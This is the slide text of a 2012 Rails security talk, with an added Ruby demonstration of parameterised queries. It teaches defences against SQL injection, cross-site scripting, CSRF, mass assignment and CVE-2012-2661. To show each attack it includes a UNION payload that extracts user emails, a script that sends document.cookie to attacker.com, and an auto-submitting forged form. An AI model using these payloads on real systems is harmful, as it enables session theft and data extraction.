web application security in rails
Posted on 15-May-2015
WEB APPLICATION SECURITY IN RAILS
Uri Nativ RailsIsrael 2012
Uri Nativ @unativ
Head of Engineering
Klarna Tel Aviv
#railsisrael
Buy Now, Pay Later
1. Shop online
2. Receive your goods
3. Pay
Alice
Bob
Alice and Bob
Like Duh?
Alice and Bob
<html> <title> MicroBlogging </title> ...
#$@# %#@&*#$
Alice and Bob
Hack it!
SQL INJECTION
@results = Micropost.where("content LIKE '%#{params[:query]}%'").all
SELECT `microposts`.* FROM `microposts` WHERE (content LIKE '%SEARCHSTRING%')
SQL Injection
XXX') UNION SELECT 1, email, 1, 1, 1 FROM users --
SELECT `microposts`.* FROM `microposts` WHERE (content LIKE '%XXX') UNION SELECT 1, email, 1, 1, 1 FROM users -- %')
SQL Injection
@results = Micropost.where("content LIKE ?", "%#{params[:query]}%").all
SQL Injection - countermeasures
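As an added example (not the talk's code and not Rails itself), a plain-Ruby model of the two Micropost.where forms on the slides above: the interpolated string that produces the UNION statement, and the `?` placeholder form in which the bind value is quoted before substitution. It assumes the single-quote-doubling rule used by SQLite and PostgreSQL for the placeholder (MySQL's adapter backslash-escapes instead, with the same effect), and `injected?` is a constructed check that flags a statement in which the input has escaped its string literal.

```ruby
# Added example (not the talk's code, not Rails itself): a plain-Ruby model of
# the two Micropost.where forms from the slides, plus a check a reviewer can run.

# Payload from the slide, kept verbatim (trailing space included).
PAYLOAD = "XXX') UNION SELECT 1, email, 1, 1, 1 FROM users -- "

# Vulnerable form: params[:query] is interpolated straight into the SQL text.
def interpolated_query(query)
  "SELECT `microposts`.* FROM `microposts` WHERE (content LIKE '%#{query}%')"
end

# Quote a value as a SQL string literal by doubling embedded single quotes.
# Assumed rule (SQLite/PostgreSQL style); MySQL backslash-escapes instead, but
# either way the attacker's quote can no longer close the literal.
def quote_literal(value)
  "'" + value.to_s.gsub("'", "''") + "'"
end

# Safe form: the template carries `?` placeholders and each bind is quoted
# before substitution, as Micropost.where("content LIKE ?", "%...%") does.
def bound_query(template, *binds)
  binds = binds.dup
  template.gsub("?") { quote_literal(binds.shift) }
end

def search_sql_safe(query)
  bound_query("SELECT `microposts`.* FROM `microposts` WHERE (content LIKE ?)", "%#{query}%")
end

# Constructed check: blank out every well-formed string literal (a doubled
# quote is part of the literal) and see whether a UNION, a statement separator
# or a comment marker survives outside the quotes. A LIKE search has none.
def literal_free(sql)
  sql.gsub(/'(?:[^']|'')*'/, "'?'")
end

def injected?(sql)
  literal_free(sql).match?(/\bUNION\b|;|--/)
end

if __FILE__ == $0
  puts interpolated_query(PAYLOAD)            # the UNION statement from the slide
  puts search_sql_safe(PAYLOAD)               # the payload stays inside one literal
  puts injected?(interpolated_query(PAYLOAD)) # true
  puts injected?(search_sql_safe(PAYLOAD))    # false
end
```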
CROSS SITE SCRIPTING
XSS
<span class="content">
  <%= raw feed_item.content %>
</span>
XSS
<script> document.write('<img src="http://www.attacker.com/x.png?' + document.cookie + '" >'); </script>
XSS
<span class="content">
  <%= sanitize feed_item.content, :tags => ['a'] %>
</span>
XSS - countermeasures
The Attack:
Execute arbitrary code / defacement
JSON is not escaped by default
CSS can be injected as well
Countermeasures:
Never trust data from the users
Use Markdown (e.g. Redcarpet gem)
XSS
CROSS SITE REQUEST FORGERY
CSRF
www.blog.com
CSRF
1
www.blog.com
2
Click here for free iPad
www.freeiPad.com
<form name="evilform" action="www.blog.com/…."> …
<script> document.evilform.submit() </script>
CSRF
3
www.blog.com
POST /blogpost Content="Kick Me!"
CSRF
4
<input name="authenticity_token" type="hidden" value="vyFdEgofzU4oSJJn5wypxq4" />
CSRF – Authenticity Token
routes.rb
match '/delete_post/:id', to: 'microposts#destroy'
CSRF
class ApplicationController < ActionController::Base
  # commented to easily test forms
  # protect_from_forgery
  ...
end
CSRF
The Attack:
Attacker sends requests on the victim's behalf
Doesn't depend on XSS
Attacker doesn't need to be logged in
Countermeasures:
Use Rails CSRF default protection (do not override it)
Use GET for queries
Use POST/DELETE/… when updating data
Add Sign-out link
CSRF
RAILS SPECIFIC ATTACKS
MASS ASSIGNMENT
boo[gotcha!]
def create
  @user = User.new(params[:user])
  ...
end
Mass Assignment
{ :name => "gotcha", :admin => true }
Blacklist
class User < ActiveRecord::Base
  attr_protected :admin
  ...
end
Mass Assignment - countermeasures
Whitelist
class User < ActiveRecord::Base
  attr_accessible :name, :email, :password, :password_confirmation
  ...
end
Mass Assignment - countermeasures
Global Config (whitelist)
config.active_record.whitelist_attributes = true
Mass Assignment - countermeasures
The Attack: Unprotected by default :(
Countermeasures:
Whitelist
Blacklist
Strong Parameters (whitelist): Rails 4, logic moved to the controller, available as a gem
Mass Assignment
SQL INJECTION VULNERABILITY IN RUBY ON RAILS (CVE-2012-2661)
User.where(:id => params[:user_id], :reset_token => params[:token])
SELECT users.* FROM users WHERE users.id = 6 AND users.reset_token = 'XYZ' LIMIT 1
CVE-2012-2661 SQL Injection
/users/6/password/edit?token[]
SELECT users.* FROM users WHERE users.id = 6 AND users.reset_token IS NULL LIMIT 1
CVE-2012-2661 SQL Injection
The Attack: SQL Injection - Affected version: Rails < 3.2.4
Countermeasures:
Upgrade to Rails 3.2.4 or higher
CVE-2012-2661 SQL Injection
-------------------------------------------------
| Warning Type               | Total |
-------------------------------------------------
| Cross Site Scripting       | 2     |
| Cross-Site Request Forgery | 1     |
| Denial of Service          | 1     |
| Redirect                   | 1     |
| SQL Injection              | 4     |
-------------------------------------------------
Brakeman
CONCLUSIONS
Make Love not War
Know the threats – OWASP top 10
Follow Rails conventions
Ruby on Rails Security Guide
http://guides.rubyonrails.org/security.html
The Ruby on Rails security project
http://www.rorsecurity.info
Rails security mailing list:
http://groups.google.com/group/rubyonrails-security
Conclusions
Daniel Amselem for pair programming
Irit Shainzinger for the cool graphics
Michael Hartl for his microblogging app tutorial
Thanks to…
Pay Online – Safer and Simpler
https://github.com/unativ/sample_app